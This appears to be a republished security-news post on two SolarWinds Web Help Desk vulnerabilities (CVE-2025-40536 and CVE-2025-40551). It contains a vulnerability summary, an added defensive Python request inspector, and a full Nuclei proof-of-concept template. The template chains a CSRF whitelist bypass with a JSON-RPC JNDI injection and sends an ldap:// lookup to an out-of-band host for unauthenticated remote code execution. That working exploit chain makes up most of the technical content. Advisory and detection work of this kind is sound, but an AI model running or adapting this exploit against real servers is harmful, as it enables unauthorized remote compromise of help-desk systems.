
0x00 Preface
Web Help Desk (WHD) is a service and process management system built on ITIL standards and practices. WHD offers a rich feature set for handling key IT and technical-support tasks, including incident management, problem management, change management, asset and configuration management, and knowledge management.
SolarWinds' WHD (service and process management system) uses a B/S (browser/server) architecture: users reach the web interface from a PC or a mobile device to submit service requests and generate tickets, and to carry out the incident, problem, change, asset and configuration, and knowledge management tied to a ticket's whole lifecycle.
0x01 Vulnerability Description
CVE-2025-40536 stems from WHD's improper handling of the Java WebObjects framework. By placing a crafted query parameter containing badparam=/ajax/ in the URL, an attacker bypasses the system's CSRF whitelist check and can dynamically instantiate backend components such as LoginPref without authorization.
CVE-2025-40551 targets the AjaxProxy feature with specially crafted JSON-RPC requests. By disguising the /ajax/ segment of the request path as /wo/, an attacker can easily bypass the sanitization logic of the vendor's earlier patch and inject malicious Java objects (for example via the JNDIConnectionPool or SQLite JDBC driver mechanism).
(Source: collected from the web)
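As an added defensive example (not from the original post, SolarWinds or Horizon3.ai), the Python below inspects a single HTTP request for the two shapes described above: a /wo/ page load whose query string carries "/ajax/" (the CSRF whitelist bypass) and a JSON-RPC call delivered through /wo/ whose params embed a "javaClass" object (the sanitization bypass). The WOA prefix and JNDI_GADGET class name are taken from the advisory text; the finding labels and sample inputs are constructed.

```python
"""Request inspector for the CVE-2025-40536 / CVE-2025-40551 traffic patterns.
Constructed example for a WAF or log-replay check; not vendor code."""
import json
from urllib.parse import parse_qsl, urlsplit

WOA = "/helpdesk/WebObjects/Helpdesk.woa"          # WHD application prefix
JNDI_GADGET = "org.apache.xalan.lib.sql.JNDIConnectionPool"  # class named in the advisory


def _java_classes(node):
    """Yield every 'javaClass' string nested anywhere in a decoded JSON value."""
    if isinstance(node, dict):
        if isinstance(node.get("javaClass"), str):
            yield node["javaClass"]
        for value in node.values():
            yield from _java_classes(value)
    elif isinstance(node, list):
        for value in node:
            yield from _java_classes(value)


def inspect_request(method, url, body=None):
    """Return a list of finding strings for one request; empty means nothing matched."""
    findings = []
    parts = urlsplit(url)
    on_wo_route = parts.path.startswith(WOA + "/wo/")
    # CVE-2025-40536: a /wo/ page load whose query string carries "/ajax/", so a
    # URI-substring CSRF whitelist treats it as an ajax request (parse_qsl also
    # decodes percent-encoded forms of the value).
    if on_wo_route:
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if "/ajax/" in value:
                findings.append(f"csrf-whitelist-bypass: '/ajax/' in query param {name!r}")
    # CVE-2025-40551: a JSON-RPC call sent via /wo/ instead of /ajax/, the route
    # the earlier payload sanitization did not cover.
    if on_wo_route and method.upper() == "POST" and body:
        try:
            rpc = json.loads(body)
        except ValueError:
            return findings  # not JSON, so not a JSON-RPC bridge call
        if isinstance(rpc, dict) and "method" in rpc and "params" in rpc:
            findings.append("jsonrpc-via-wo: JSON-RPC method %r on /wo/ route" % rpc["method"])
            for cls in _java_classes(rpc["params"]):
                level = "high" if cls == JNDI_GADGET else "medium"
                findings.append(f"javaclass-in-params ({level}): {cls}")
    return findings
```

Any "javaClass" in params is reported at medium confidence because the sanitization bypass is not tied to one gadget class; the advisory's class is raised to high.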
0x02 CVE IDs
CVE-2025-40536
CVE-2025-40551
0x03 Affected Versions
All versions of SolarWinds Web Help Desk prior to 2026.1
0x04 Vulnerability Details
POC:
https://cloud.projectdiscovery.io/library/CVE-2025-40551
id: CVE-2025-40551

info:
  name: SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
  author: Horizon3.ai
  severity: critical
  description: |
    SolarWinds Web Help Desk before version 2026.1 contains an insecure deserialization vulnerability in the jabsorb JSON-RPC library. When chained with a CSRF whitelist bypass (CVE-2025-40536), remote unauthenticated attackers can exploit JNDI injection via the Apache Xalan JNDIConnectionPool class to achieve remote code execution. The bypass involves including "/ajax/" in a query parameter to circumvent URI validation, while switching from "/ajax/" to "/wo/" endpoints bypasses payload sanitization routines.
  impact: |
    Remote attackers can execute arbitrary code on the host machine without authentication, potentially leading to full system compromise.
  remediation: |
    Update SolarWinds Web Help Desk to version 2026.1 or later.
  reference:
    - https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40551
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40551
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40551
    cwe-id: CWE-502
    epss-score: 0.79316
    epss-percentile: 0.9904
  metadata:
    verified: true
    max-request: 6
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:1895809524
  tags: cve,cve2025,solarwinds,webhelpdesk,deserialization,rce,jndi,oast,kev,vkev

flow: |
  http("initial_session") &&
  http("login_pref_page") &&
  http("trigger_saml_object") &&
  http("create_jsonrpc_bridge") &&
  http("create_malicious_object") &&
  http("trigger_jndi_lookup")

http:
  - id: initial_session
    method: GET
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa"
    headers:
      x-webobjects-recording: 1
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(tolower(all_headers), "x-webobjects-session-id")
          - contains(tolower(all_headers), "xsrf-token")
          - contains(toupper(all_headers), "JSESSIONID")
        internal: true
        condition: and
      - type: status
        status:
          - 200
        internal: true
    extractors:
      - type: regex
        name: wosid
        part: header
        regex:
          - "[xX]-[W]ebobjects-[sS]ession-[iI]d: ([a-zA-Z0-9]{22})"
        group: 1
        internal: true
      - type: regex
        name: xsrf_token
        part: header
        group: 1
        regex:
          - "Set-Cookie: XSRF-TOKEN=([a-z0-9-]{36});"
        internal: true

  - id: login_pref_page
    method: GET
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/{{wosid}}/1.0?badparam=/ajax/&wopage=LoginPref"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - externalAuthContainer
          - SAML 2.0
        internal: true
        condition: and
      - type: status
        status:
          - 200
        internal: true
    extractors:
      - type: regex
        name: externalAuthContainer
        part: body
        group: 1
        regex:
          - 'id="externalAuthContainer" updateUrl="/(helpdesk/WebObjects/Helpdesk.woa/ajax/[0-9]+\.[0-9]+)'
        internal: true

  - id: trigger_saml_object
    method: POST
    path:
      - "{{BaseURL}}/{{externalAuthContainer}}"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
    body: 0.7.1.3.1.0.0.0.1.1.0=1&_csrf={{xsrf_token}}
    matchers:
      - type: status
        status:
          - 200
        internal: true

  - id: create_jsonrpc_bridge
    method: GET
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/{{wosid}}/1.0?badparam=/ajax/&wopage=LoginPref"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - JSONRpcClient
        internal: true
      - type: status
        status:
          - 200
        internal: true
    extractors:
      - type: regex
        name: jsonrpc_endpoint
        part: body
        group: 1
        regex:
          - "JSONRpcClient\\('/helpdesk/WebObjects/Helpdesk.woa/ajax/([0-9.]+)'\\);"
        internal: true

  - id: create_malicious_object
    method: POST
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/{{jsonrpc_endpoint}}"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
      Content-Type: application/json
    body: |
      {
        "bypass":"java.parentpopupwonoselectionstringdummymdssubmitlinkmdsform__enterkeypressedmdsform__shiftkeypressedmdsform__altkeypressed_csrf",
        "id":1,
        "method":"wopage.setVariableValueForName",
        "params":[
          "malicious",
          {
            "javaClass":"org.apache.xalan.lib.sql.JNDIConnectionPool",
            "jndiPath":"ldap://{{interactsh-url}}/ou=ou,o=o"
          }
        ]
      }
    matchers:
      - type: status
        status:
          - 200
        internal: true

  - id: trigger_jndi_lookup
    method: POST
    path:
      - "{{BaseURL}}/helpdesk/WebObjects/Helpdesk.woa/wo/{{jsonrpc_endpoint}}"
    headers:
      X-Xsrf-Token: "{{xsrf_token}}"
      Content-Type: application/json
    body: |
      {
        "bypass":"java.parentpopupwonoselectionstringdummymdssubmitlinkmdsform__enterkeypressedmdsform__shiftkeypressedmdsform__altkeypressed_csrf",
        "id":1,
        "method":"wopage.variableValueForName",
        "params":["malicious"]
      }
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: status
        status:
          - 200
# digest: 490a0046304402204b0a6bc483452e1ee2b308094a593bec3a0ae5d5942c1734e418d4e1c4f7204602200a5ea4296b6063f62cb9005cc5486473e379e8766062f65d511c28874abd5599:922c64590222798bb761d5b6d8e72950

0x05 References
https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551
https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40536
PS: This account shares domestic and international security news. You are welcome to share and repost, but please keep the article intact. If the article contains sensitive information or infringing content, please contact the author to have it removed. Information security is a long road; thank you for your support.

!!!
The articles and tools on this public account are provided for learning and reference only. Any direct or indirect consequences or losses arising from the dissemination or use of the information in this document are the sole responsibility of the user; this account and the article's author accept no liability for them.